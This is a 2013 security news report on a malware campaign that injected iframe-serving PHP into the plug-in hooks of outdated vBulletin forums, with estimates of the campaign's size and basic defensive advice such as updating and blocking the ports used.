vBulletin Forum Becomes Target for Cybercriminals, Warns Sucuri

Sucuri, a known security firm, warns that vBulletin is a renowned forum platform which is becoming a favorite target for web-based attacks launched by unscrupulous cyber crooks, reported blog.sucuri.net in the first week of July 2013.

vBulletin had some severe security flaws in older versions, and when a forum employing them is not correctly updated, it (referring to vBulltein) ends up hosting malicious software or malware, it notes.

vBulletin is unique in storing templates and plug-ins. It is poles apart from WordPress and Joomla and all its matter is saved in database making it a complex for webmasters as they can't employ common command line tools to search through all their files. They require using phpMyAdmin or other database tools to fix those problems.

It employs the Plug-in system which hooks to a page "global start" and here exists the malware.

The PHP-code which is injected contacts the domain front adabeupdate.com, gets data and sends to the end user which permits the malware to be inserted into the forum pages and pushed to the visitors through iFrames.

Softpedia.com published a report on 8th July, 2013 quoting Daniel Cid, Sucuri CTO saying "The content is remotely generated and changing frequently but the format is same always".

The campaign's size has been determined on the basis of number of websites found by Google to enclose a certain error during a time period when the server hosts one of the malicious domains.

Google indexed more than 15,000 pages and because not all websites have "display¬¬_errors" enabled, it is estimated as per experts that total number of hijacked websites could be ten times higher than the above mentioned number, that is, it could be around 150,000.

So how do you protect yourself from such web attacks? The most significant step one can take is to keep their vBulletin updated.

In addition, users are recommended to check their template and plug-in lists to find any malicious contents. As malicious iframes constantly use 36 and 38 port numbers, ISPs can guard their consumers by blocking these ports, that is, the above mentioned ports externally.

» SPAMfighter News - 7/18/2013